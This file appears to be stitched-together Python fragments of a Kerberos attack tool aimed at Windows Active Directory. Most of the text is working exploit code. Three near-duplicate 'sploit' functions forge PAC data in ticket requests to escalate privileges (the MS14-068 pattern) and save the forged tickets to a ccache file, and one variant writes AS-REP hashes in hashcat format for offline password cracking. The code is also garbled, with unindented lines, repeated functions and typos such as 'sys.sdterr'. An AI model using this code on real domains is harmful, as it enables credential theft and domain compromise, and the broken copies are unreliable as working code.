def net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a):
if 'pre' in krbTricks.set_arg:
if krbTricks.set_arg['pre'] == True:
krbTricks.set_arg['padata_type'] = 2
else:
krbTricks.set_arg['padata_type'] = 149
sys.stderr.write(' [+] Building AS-REQ for %s@%s...' % (user_name,user_realm))
sys.stderr.flush()
nonce = getrandbits(31)
current_time = time()
pac_request=False
as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request, krbTricks.set_arg['padata_type'])
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(as_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
hdata = binascii.b2a_hex(data)
#krbTricks.set_arg['pre'] = False
if 'pre' in krbTricks.set_arg:
if krbTricks.set_arg['pre'] == True:
krbTricks.set_arg['net_krbas_tgs'] = hdata
else:
krbTricks.set_arg['net_krbas'] = hdata
else:
krbTricks.set_arg['net_krbas'] = hdata
def check(self, domain, dc_name, account):
nonce = getrandbits(31)
current_time = time()
etype = AES256
as_req = build_as_req(get_netbios_domain(domain), account, None, current_time, nonce, True, etype)
kdc_dns = "{dc_name}.{domain}".format(dc_name=dc_name, domain=domain)
try:
sock = send_req(as_req, kdc_dns, )
data = recv_rep(sock)
err_enc = decode(data, asn1Spec=KrbError())[0]
print(err_enc['error-code'])
if err_enc['error-code'] == KDC_ERR_ETYPE_NOSUPP:
# TODO 发现万能钥匙
return
except timeout:
pass
except ConnectionRefusedError:
pass
except Exception as e:
traceback.print_exc()
def sploit(user_realm,
user_name,
user_sid,
user_key,
kdc_a,
kdc_b,
target_realm,
target_service,
target_host,
output_filename,
krbtgt_a_key=None,
trust_ab_key=None,
target_key=None):
sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
sys.stderr.flush()
nonce = getrandbits(31)
current_time = time()
as_req = build_as_req(user_realm,
user_name,
user_key,
current_time,
nonce,
pac_request=False)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(as_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
sys.stderr.flush()
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
session_key = (int(as_rep_enc['key']['keytype']),
str(as_rep_enc['key']['keyvalue']))
logon_time = gt2epoch(str(as_rep_enc['authtime']))
tgt_a = as_rep['ticket']
sys.stderr.write(' Done!\n')
if krbtgt_a_key is not None:
print >> sys.sdterr, as_rep.prettyPrint()
print >> sys.stderr, as_rep_enc.prettyPrint()
ticket_debug(tgt_a, krbtgt_a_key)
sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
sys.stderr.flush()
subkey = generate_subkey()
nonce = getrandbits(31)
current_time = time()
pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid,
logon_time))
tgs_req = build_tgs_req(user_realm,
'krbtgt',
target_realm,
user_realm,
user_name,
tgt_a,
session_key,
subkey,
nonce,
current_time,
pac,
pac_request=False)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(tgs_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
session_key2 = (int(tgs_rep_enc['key']['keytype']),
str(tgs_rep_enc['key']['keyvalue']))
tgt_b = tgs_rep['ticket']
sys.stderr.write(' Done!\n')
if trust_ab_key is not None:
pretty_print_pac(pac[1])
print >> sys.stderr, tgs_rep.prettyPrint()
print >> sys.stderr, tgs_rep_enc.prettyPrint()
ticket_debug(tgt_b, trust_ab_key)
if target_service is not None and target_host is not None and kdc_b is not None:
sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
sys.stderr.flush()
subkey = generate_subkey()
nonce = getrandbits(31)
current_time = time()
tgs_req2 = build_tgs_req(target_realm, target_service, target_host,
user_realm, user_name, tgt_b, session_key2,
subkey, nonce, current_time)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
sys.stderr.flush()
sock = send_req(tgs_req2, kdc_b)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
sys.stderr.write(' Done!\n')
else:
tgs_rep2 = tgs_rep
tgs_rep_enc2 = tgs_rep_enc
sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
cc = CCache((user_realm, user_name))
tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
cc.add_credential(tgs_cred)
cc.save(output_filename)
sys.stderr.write(' Done!\n')
if target_key is not None:
print >> sys.stderr, tgs_rep2.prettyPrint()
print >> sys.stderr, tgs_rep_enc2.prettyPrint()
ticket_debug(tgs_rep2['ticket'], target_key)
def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host,
output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
sys.stderr.flush()
nonce = getrandbits(31)
current_time = time()
as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(as_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
sys.stderr.flush()
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
logon_time = gt2epoch(str(as_rep_enc['authtime']))
tgt_a = as_rep['ticket']
sys.stderr.write(' Done!\n')
if krbtgt_a_key is not None:
print >> sys.sdterr, as_rep.prettyPrint()
print >> sys.stderr, as_rep_enc.prettyPrint()
ticket_debug(tgt_a, krbtgt_a_key)
sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
sys.stderr.flush()
subkey = generate_subkey()
nonce = getrandbits(31)
current_time = time()
pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(tgs_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
tgt_b = tgs_rep['ticket']
sys.stderr.write(' Done!\n')
if trust_ab_key is not None:
pretty_print_pac(pac[1])
print >> sys.stderr, tgs_rep.prettyPrint()
print >> sys.stderr, tgs_rep_enc.prettyPrint()
ticket_debug(tgt_b, trust_ab_key)
if target_service is not None and target_host is not None and kdc_b is not None:
sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
sys.stderr.flush()
subkey = generate_subkey()
nonce = getrandbits(31)
current_time = time()
tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
tgt_b, session_key2, subkey, nonce, current_time)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
sys.stderr.flush()
sock = send_req(tgs_req2, kdc_b)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
sys.stderr.write(' Done!\n')
else:
tgs_rep2 = tgs_rep
tgs_rep_enc2 = tgs_rep_enc
sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
cc = CCache((user_realm, user_name))
tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
cc.add_credential(tgs_cred)
cc.save(output_filename)
sys.stderr.write(' Done!\n')
if target_key is not None:
print >> sys.stderr, tgs_rep2.prettyPrint()
print >> sys.stderr, tgs_rep_enc2.prettyPrint()
ticket_debug(tgs_rep2['ticket'], target_key)
def sploit(user_realm,
user_name,
user_key,
kdc_a,
kdc_b,
target_realm,
target_service,
target_host,
output_filename,
krbtgt_a_key=None,
trust_ab_key=None,
target_key=None):
sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
sys.stderr.flush()
#nonce = getrandbits(31)
nonce = 12381973
current_time = time()
#as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
as_req = build_as_req(user_realm,
user_name,
user_key,
current_time,
nonce,
pac_request=True)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
sys.stderr.flush()
sock = send_req(as_req, kdc_a)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
sys.stderr.flush()
data = recv_rep(sock)
sys.stderr.write(' Done!\n')
sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
sys.stderr.flush()
as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
#session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
#logon_time = gt2epoch(str(as_rep_enc['authtime']))
#tgt_a = as_rep['ticket']
sys.stderr.write(' Done!\n')
enc_string = "".join("{:02x}".format(ord(c)) for c in as_rep_enc)
hashcat_enc = enc_string[:32] + '$' + enc_string[32:]
#sys.stderr.write('%s\n' % as_rep)
sys.stderr.write('$krb5asrep$23$%s@%s:%s\n' %
(user_name, user_realm, hashcat_enc))
#if krbtgt_a_key is not None:
# print >> sys.sdterr, as_rep.prettyPrint()
# print >> sys.stderr, as_rep_enc.prettyPrint()
# ticket_debug(tgt_a, krbtgt_a_key)
# sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
# sys.stderr.flush()
# subkey = generate_subkey()
# nonce = getrandbits(31)
# current_time = time()
# pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
# tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
# tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
# sys.stderr.write(' Done!\n')
#
# sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
# sys.stderr.flush()
# sock = send_req(tgs_req, kdc_a)
# sys.stderr.write(' Done!\n')
# sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
# sys.stderr.flush()
# data = recv_rep(sock)
# sys.stderr.write(' Done!\n')
# sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
# tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
# session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
# tgt_b = tgs_rep['ticket']
# sys.stderr.write(' Done!\n')
# if trust_ab_key is not None:
# pretty_print_pac(pac[1])
# print >> sys.stderr, tgs_rep.prettyPrint()
# print >> sys.stderr, tgs_rep_enc.prettyPrint()
# ticket_debug(tgt_b, trust_ab_key)
# if target_service is not None and target_host is not None and kdc_b is not None:
# sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
# sys.stderr.flush()
# subkey = generate_subkey()
# nonce = getrandbits(31)
# current_time = time()
# tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
# tgt_b, session_key2, subkey, nonce, current_time)
# sys.stderr.write(' Done!\n')
# sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
# sys.stderr.flush()
# sock = send_req(tgs_req2, kdc_b)
# sys.stderr.write(' Done!\n')
# sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
# sys.stderr.flush()
# data = recv_rep(sock)
# sys.stderr.write(' Done!\n')
# sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
# tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
# sys.stderr.write(' Done!\n')
# else:
# tgs_rep2 = tgs_rep
# tgs_rep_enc2 = tgs_rep_enc
# sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
# cc = CCache((user_realm, user_name))
# tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
# cc.add_credential(tgs_cred)
# cc.save(output_filename)
# sys.stderr.write(' Done!\n')
# Output as-rep to file (hard-coded) atm
file = open("hashcat.out", "a")
file.write('$krb5asrep$23$%s@%s:%s\n' %
(user_name, user_realm, hashcat_enc))
file.close()